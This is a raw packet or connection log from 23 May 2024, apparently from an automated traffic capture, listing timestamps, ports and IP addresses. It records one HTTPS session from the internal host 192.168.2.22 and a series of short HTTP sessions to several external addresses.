May 23, 2024 20:17:26.697302103 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.697336912 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.697356939 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.697391987 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.699528933 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.699604034 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.699606895 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.699628115 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.699664116 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.699687958 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.701867104 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.701939106 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.701941967 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.701960087 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.701992035 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.702013016 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.739219904 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.739269018 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.739314079 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.739351988 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.739388943 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.739417076 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.739417076 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.741038084 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.741085052 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.741122961 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.741141081 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.741167068 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.741189957 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.743796110 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.743841887 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.743879080 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.743896008 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.743921995 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.743951082 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.745934010 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.745978117 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.746025085 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.746025085 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.746063948 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.746129036 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.794523954 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.794586897 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.794645071 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.794646025 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.794720888 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.794787884 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.794789076 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.796637058 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.796684980 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.796722889 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.796744108 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.796771049 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.796798944 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.798896074 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.798947096 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.798981905 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.798999071 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.799025059 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.799025059 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.799048901 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.832067013 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.832113981 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.832159996 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.832180023 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.832204103 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.832221985 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.832240105 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.833738089 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.833779097 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.833815098 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.833832026 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.833854914 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.833872080 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.835721016 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.835792065 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.835813046 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.835829020 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.835850954 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.835866928 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.837755919 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.837811947 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.837821960 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.837831974 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.837861061 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.837879896 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.894465923 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.894773006 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.894769907 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.894841909 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.894884109 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.894906044 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.896209955 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.896298885 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.896472931 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.896549940 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.897721052 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.897797108 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.897835016 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.897898912 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.898853064 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.898916006 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.898931026 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.898952007 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.898983955 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.899243116 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.899264097 CEST	443	49163	104.21.74.191	192.168.2.22
May 23, 2024 20:17:26.899306059 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:26.899336100 CEST	49163	443	192.168.2.22	104.21.74.191
May 23, 2024 20:17:35.116014957 CEST	49164	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:35.121082067 CEST	80	49164	188.114.97.3	192.168.2.22
May 23, 2024 20:17:35.121145010 CEST	49164	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:35.132025003 CEST	49164	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:35.171545982 CEST	80	49164	188.114.97.3	192.168.2.22
May 23, 2024 20:17:35.171624899 CEST	49164	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:35.176558018 CEST	80	49164	188.114.97.3	192.168.2.22
May 23, 2024 20:17:35.880770922 CEST	80	49164	188.114.97.3	192.168.2.22
May 23, 2024 20:17:35.885533094 CEST	80	49164	188.114.97.3	192.168.2.22
May 23, 2024 20:17:35.885613918 CEST	49164	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:35.944128036 CEST	49164	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:35.949229002 CEST	80	49164	188.114.97.3	192.168.2.22
May 23, 2024 20:17:36.591785908 CEST	49165	80	192.168.2.22	188.114.96.9
May 23, 2024 20:17:36.599327087 CEST	80	49165	188.114.96.9	192.168.2.22
May 23, 2024 20:17:36.602499008 CEST	49165	80	192.168.2.22	188.114.96.9
May 23, 2024 20:17:36.624490023 CEST	49165	80	192.168.2.22	188.114.96.9
May 23, 2024 20:17:36.664602995 CEST	80	49165	188.114.96.9	192.168.2.22
May 23, 2024 20:17:36.664830923 CEST	49165	80	192.168.2.22	188.114.96.9
May 23, 2024 20:17:36.670833111 CEST	80	49165	188.114.96.9	192.168.2.22
May 23, 2024 20:17:37.356448889 CEST	80	49165	188.114.96.9	192.168.2.22
May 23, 2024 20:17:37.361100912 CEST	80	49165	188.114.96.9	192.168.2.22
May 23, 2024 20:17:37.361171961 CEST	49165	80	192.168.2.22	188.114.96.9
May 23, 2024 20:17:37.373935938 CEST	49165	80	192.168.2.22	188.114.96.9
May 23, 2024 20:17:37.411607027 CEST	80	49165	188.114.96.9	192.168.2.22
May 23, 2024 20:17:38.070725918 CEST	49166	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:38.075866938 CEST	80	49166	188.114.97.3	192.168.2.22
May 23, 2024 20:17:38.076045990 CEST	49166	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:38.077506065 CEST	49166	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:38.127773046 CEST	80	49166	188.114.97.3	192.168.2.22
May 23, 2024 20:17:38.127974987 CEST	49166	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:38.133029938 CEST	80	49166	188.114.97.3	192.168.2.22
May 23, 2024 20:17:38.840037107 CEST	80	49166	188.114.97.3	192.168.2.22
May 23, 2024 20:17:38.847635984 CEST	80	49166	188.114.97.3	192.168.2.22
May 23, 2024 20:17:38.847784996 CEST	49166	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:38.849159002 CEST	49166	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:38.904620886 CEST	80	49166	188.114.97.3	192.168.2.22
May 23, 2024 20:17:39.489084005 CEST	49167	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:39.494102001 CEST	80	49167	188.114.97.3	192.168.2.22
May 23, 2024 20:17:39.494158030 CEST	49167	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:39.511373997 CEST	49167	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:39.548213959 CEST	80	49167	188.114.97.3	192.168.2.22
May 23, 2024 20:17:39.548326015 CEST	49167	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:39.553802967 CEST	80	49167	188.114.97.3	192.168.2.22
May 23, 2024 20:17:40.474148989 CEST	80	49167	188.114.97.3	192.168.2.22
May 23, 2024 20:17:40.478792906 CEST	80	49167	188.114.97.3	192.168.2.22
May 23, 2024 20:17:40.478802919 CEST	80	49167	188.114.97.3	192.168.2.22
May 23, 2024 20:17:40.478847980 CEST	49167	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:40.490259886 CEST	49167	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:40.531708002 CEST	80	49167	188.114.97.3	192.168.2.22
May 23, 2024 20:17:40.799885988 CEST	49168	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:40.804945946 CEST	80	49168	188.114.97.3	192.168.2.22
May 23, 2024 20:17:40.805015087 CEST	49168	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:40.814233065 CEST	49168	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:40.859853029 CEST	80	49168	188.114.97.3	192.168.2.22
May 23, 2024 20:17:40.859951019 CEST	49168	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:40.865479946 CEST	80	49168	188.114.97.3	192.168.2.22
May 23, 2024 20:17:41.576291084 CEST	80	49168	188.114.97.3	192.168.2.22
May 23, 2024 20:17:41.581201077 CEST	80	49168	188.114.97.3	192.168.2.22
May 23, 2024 20:17:41.581252098 CEST	49168	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:41.586072922 CEST	49168	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:41.632005930 CEST	80	49168	188.114.97.3	192.168.2.22
May 23, 2024 20:17:42.109236002 CEST	49169	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:42.114214897 CEST	80	49169	188.114.96.3	192.168.2.22
May 23, 2024 20:17:42.114330053 CEST	49169	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:42.120354891 CEST	49169	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:42.170806885 CEST	80	49169	188.114.96.3	192.168.2.22
May 23, 2024 20:17:42.170939922 CEST	49169	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:42.175817013 CEST	80	49169	188.114.96.3	192.168.2.22
May 23, 2024 20:17:42.919584990 CEST	80	49169	188.114.96.3	192.168.2.22
May 23, 2024 20:17:42.919861078 CEST	49169	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:42.924266100 CEST	80	49169	188.114.96.3	192.168.2.22
May 23, 2024 20:17:42.924320936 CEST	49169	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:42.971385002 CEST	80	49169	188.114.96.3	192.168.2.22
May 23, 2024 20:17:43.176048040 CEST	49170	80	192.168.2.22	188.114.97.9
May 23, 2024 20:17:43.180883884 CEST	80	49170	188.114.97.9	192.168.2.22
May 23, 2024 20:17:43.180951118 CEST	49170	80	192.168.2.22	188.114.97.9
May 23, 2024 20:17:43.183161974 CEST	49170	80	192.168.2.22	188.114.97.9
May 23, 2024 20:17:43.233103991 CEST	80	49170	188.114.97.9	192.168.2.22
May 23, 2024 20:17:43.233190060 CEST	49170	80	192.168.2.22	188.114.97.9
May 23, 2024 20:17:43.238657951 CEST	80	49170	188.114.97.9	192.168.2.22
May 23, 2024 20:17:43.932068110 CEST	80	49170	188.114.97.9	192.168.2.22
May 23, 2024 20:17:43.934191942 CEST	49170	80	192.168.2.22	188.114.97.9
May 23, 2024 20:17:43.937166929 CEST	80	49170	188.114.97.9	192.168.2.22
May 23, 2024 20:17:43.937246084 CEST	49170	80	192.168.2.22	188.114.97.9
May 23, 2024 20:17:43.983488083 CEST	80	49170	188.114.97.9	192.168.2.22
May 23, 2024 20:17:44.099658012 CEST	49171	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:44.104619980 CEST	80	49171	188.114.97.3	192.168.2.22
May 23, 2024 20:17:44.104661942 CEST	49171	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:44.106858969 CEST	49171	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:44.162305117 CEST	80	49171	188.114.97.3	192.168.2.22
May 23, 2024 20:17:44.162367105 CEST	49171	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:44.167567015 CEST	80	49171	188.114.97.3	192.168.2.22
May 23, 2024 20:17:44.893239975 CEST	80	49171	188.114.97.3	192.168.2.22
May 23, 2024 20:17:44.893529892 CEST	49171	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:44.898010015 CEST	80	49171	188.114.97.3	192.168.2.22
May 23, 2024 20:17:44.898077965 CEST	49171	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:44.943418026 CEST	80	49171	188.114.97.3	192.168.2.22
May 23, 2024 20:17:45.148416042 CEST	49172	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:45.153445005 CEST	80	49172	188.114.96.3	192.168.2.22
May 23, 2024 20:17:45.153522015 CEST	49172	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:45.155200958 CEST	49172	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:45.203612089 CEST	80	49172	188.114.96.3	192.168.2.22
May 23, 2024 20:17:45.203666925 CEST	49172	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:45.208651066 CEST	80	49172	188.114.96.3	192.168.2.22
May 23, 2024 20:17:45.883692026 CEST	80	49172	188.114.96.3	192.168.2.22
May 23, 2024 20:17:45.883852959 CEST	49172	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:45.888523102 CEST	80	49172	188.114.96.3	192.168.2.22
May 23, 2024 20:17:45.888623953 CEST	49172	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:45.939382076 CEST	80	49172	188.114.96.3	192.168.2.22
May 23, 2024 20:17:46.325746059 CEST	49173	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:46.330709934 CEST	80	49173	188.114.96.3	192.168.2.22
May 23, 2024 20:17:46.330794096 CEST	49173	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:46.332436085 CEST	49173	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:46.383599997 CEST	80	49173	188.114.96.3	192.168.2.22
May 23, 2024 20:17:46.383657932 CEST	49173	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:46.388659954 CEST	80	49173	188.114.96.3	192.168.2.22
May 23, 2024 20:17:47.055252075 CEST	80	49173	188.114.96.3	192.168.2.22
May 23, 2024 20:17:47.055354118 CEST	49173	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:47.060676098 CEST	80	49173	188.114.96.3	192.168.2.22
May 23, 2024 20:17:47.060729027 CEST	49173	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:47.112226009 CEST	80	49173	188.114.96.3	192.168.2.22
May 23, 2024 20:17:47.201549053 CEST	49174	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:47.206870079 CEST	80	49174	188.114.97.3	192.168.2.22
May 23, 2024 20:17:47.206937075 CEST	49174	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:47.208604097 CEST	49174	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:47.267617941 CEST	80	49174	188.114.97.3	192.168.2.22
May 23, 2024 20:17:47.267741919 CEST	49174	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:47.272815943 CEST	80	49174	188.114.97.3	192.168.2.22
May 23, 2024 20:17:47.933002949 CEST	80	49174	188.114.97.3	192.168.2.22
May 23, 2024 20:17:47.933185101 CEST	49174	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:47.937834024 CEST	80	49174	188.114.97.3	192.168.2.22
May 23, 2024 20:17:47.937894106 CEST	49174	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:47.983546019 CEST	80	49174	188.114.97.3	192.168.2.22
May 23, 2024 20:17:48.081022024 CEST	49175	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:48.086009979 CEST	80	49175	188.114.97.3	192.168.2.22
May 23, 2024 20:17:48.086074114 CEST	49175	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:48.088332891 CEST	49175	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:48.139568090 CEST	80	49175	188.114.97.3	192.168.2.22
May 23, 2024 20:17:48.139667034 CEST	49175	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:48.147770882 CEST	80	49175	188.114.97.3	192.168.2.22
May 23, 2024 20:17:48.808289051 CEST	80	49175	188.114.97.3	192.168.2.22
May 23, 2024 20:17:48.813255072 CEST	80	49175	188.114.97.3	192.168.2.22
May 23, 2024 20:17:48.813329935 CEST	49175	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:48.860275984 CEST	49175	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:48.869005919 CEST	80	49175	188.114.97.3	192.168.2.22
May 23, 2024 20:17:49.140733957 CEST	49176	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:49.145891905 CEST	80	49176	188.114.96.3	192.168.2.22
May 23, 2024 20:17:49.145962954 CEST	49176	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:49.147569895 CEST	49176	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:49.199695110 CEST	80	49176	188.114.96.3	192.168.2.22
May 23, 2024 20:17:49.199896097 CEST	49176	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:49.204910040 CEST	80	49176	188.114.96.3	192.168.2.22
May 23, 2024 20:17:49.905791998 CEST	80	49176	188.114.96.3	192.168.2.22
May 23, 2024 20:17:49.906160116 CEST	49176	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:49.910547972 CEST	80	49176	188.114.96.3	192.168.2.22
May 23, 2024 20:17:49.910604954 CEST	49176	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:49.959408045 CEST	80	49176	188.114.96.3	192.168.2.22
May 23, 2024 20:17:50.051990986 CEST	49177	80	192.168.2.22	188.114.96.9
May 23, 2024 20:17:50.057035923 CEST	80	49177	188.114.96.9	192.168.2.22
May 23, 2024 20:17:50.057102919 CEST	49177	80	192.168.2.22	188.114.96.9
May 23, 2024 20:17:50.058542013 CEST	49177	80	192.168.2.22	188.114.96.9
May 23, 2024 20:17:50.112355947 CEST	80	49177	188.114.96.9	192.168.2.22
May 23, 2024 20:17:50.112425089 CEST	49177	80	192.168.2.22	188.114.96.9
May 23, 2024 20:17:50.117789030 CEST	80	49177	188.114.96.9	192.168.2.22
May 23, 2024 20:17:50.802231073 CEST	80	49177	188.114.96.9	192.168.2.22
May 23, 2024 20:17:50.802339077 CEST	49177	80	192.168.2.22	188.114.96.9
May 23, 2024 20:17:50.807312965 CEST	80	49177	188.114.96.9	192.168.2.22
May 23, 2024 20:17:50.807367086 CEST	49177	80	192.168.2.22	188.114.96.9
May 23, 2024 20:17:50.855453014 CEST	80	49177	188.114.96.9	192.168.2.22
May 23, 2024 20:17:50.937957048 CEST	49178	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:50.942970991 CEST	80	49178	188.114.96.3	192.168.2.22
May 23, 2024 20:17:50.943027020 CEST	49178	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:50.944456100 CEST	49178	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:50.995748997 CEST	80	49178	188.114.96.3	192.168.2.22
May 23, 2024 20:17:50.995795965 CEST	49178	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:51.001267910 CEST	80	49178	188.114.96.3	192.168.2.22
May 23, 2024 20:17:51.653791904 CEST	80	49178	188.114.96.3	192.168.2.22
May 23, 2024 20:17:51.653944016 CEST	49178	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:51.658459902 CEST	80	49178	188.114.96.3	192.168.2.22
May 23, 2024 20:17:51.658519030 CEST	49178	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:51.707755089 CEST	80	49178	188.114.96.3	192.168.2.22
May 23, 2024 20:17:51.796621084 CEST	49179	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:51.804518938 CEST	80	49179	188.114.96.3	192.168.2.22
May 23, 2024 20:17:51.804610968 CEST	49179	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:51.806005955 CEST	49179	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:51.855845928 CEST	80	49179	188.114.96.3	192.168.2.22
May 23, 2024 20:17:51.855957031 CEST	49179	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:51.860971928 CEST	80	49179	188.114.96.3	192.168.2.22
May 23, 2024 20:17:52.548186064 CEST	80	49179	188.114.96.3	192.168.2.22
May 23, 2024 20:17:52.548321009 CEST	49179	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:52.552872896 CEST	80	49179	188.114.96.3	192.168.2.22
May 23, 2024 20:17:52.552938938 CEST	49179	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:52.599406958 CEST	80	49179	188.114.96.3	192.168.2.22
May 23, 2024 20:17:52.688085079 CEST	49180	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:52.692955017 CEST	80	49180	188.114.97.3	192.168.2.22
May 23, 2024 20:17:52.693020105 CEST	49180	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:52.694695950 CEST	49180	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:52.743613005 CEST	80	49180	188.114.97.3	192.168.2.22
May 23, 2024 20:17:52.743721008 CEST	49180	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:52.748622894 CEST	80	49180	188.114.97.3	192.168.2.22
May 23, 2024 20:17:53.329623938 CEST	80	49180	188.114.97.3	192.168.2.22
May 23, 2024 20:17:53.329772949 CEST	49180	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:53.339277983 CEST	80	49180	188.114.97.3	192.168.2.22
May 23, 2024 20:17:53.339392900 CEST	49180	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:53.391524076 CEST	80	49180	188.114.97.3	192.168.2.22
May 23, 2024 20:17:54.064055920 CEST	49181	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:54.071471930 CEST	80	49181	188.114.96.3	192.168.2.22
May 23, 2024 20:17:54.071584940 CEST	49181	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:54.073091984 CEST	49181	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:54.123800039 CEST	80	49181	188.114.96.3	192.168.2.22
May 23, 2024 20:17:54.123891115 CEST	49181	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:54.128961086 CEST	80	49181	188.114.96.3	192.168.2.22
May 23, 2024 20:17:54.813920021 CEST	80	49181	188.114.96.3	192.168.2.22
May 23, 2024 20:17:54.814922094 CEST	49181	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:54.818795919 CEST	80	49181	188.114.96.3	192.168.2.22
May 23, 2024 20:17:54.818844080 CEST	49181	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:54.867369890 CEST	80	49181	188.114.96.3	192.168.2.22
May 23, 2024 20:17:56.041764021 CEST	49182	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:56.046643019 CEST	80	49182	188.114.96.3	192.168.2.22
May 23, 2024 20:17:56.046679974 CEST	49182	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:56.049433947 CEST	49182	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:56.099582911 CEST	80	49182	188.114.96.3	192.168.2.22
May 23, 2024 20:17:56.099731922 CEST	49182	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:56.105164051 CEST	80	49182	188.114.96.3	192.168.2.22
May 23, 2024 20:17:56.774432898 CEST	80	49182	188.114.96.3	192.168.2.22
May 23, 2024 20:17:56.774550915 CEST	49182	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:56.779244900 CEST	80	49182	188.114.96.3	192.168.2.22
May 23, 2024 20:17:56.779294014 CEST	49182	80	192.168.2.22	188.114.96.3
May 23, 2024 20:17:56.831304073 CEST	80	49182	188.114.96.3	192.168.2.22
May 23, 2024 20:17:56.976216078 CEST	49183	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:56.981885910 CEST	80	49183	188.114.97.3	192.168.2.22
May 23, 2024 20:17:56.981940031 CEST	49183	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:56.984951973 CEST	49183	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:57.037749052 CEST	80	49183	188.114.97.3	192.168.2.22
May 23, 2024 20:17:57.037854910 CEST	49183	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:57.047576904 CEST	80	49183	188.114.97.3	192.168.2.22
May 23, 2024 20:17:57.717241049 CEST	80	49183	188.114.97.3	192.168.2.22
May 23, 2024 20:17:57.718240976 CEST	49183	80	192.168.2.22	188.114.97.3
May 23, 2024 20:17:57.723227024 CEST	80	49183	188.114.97.3	192.168.2.22
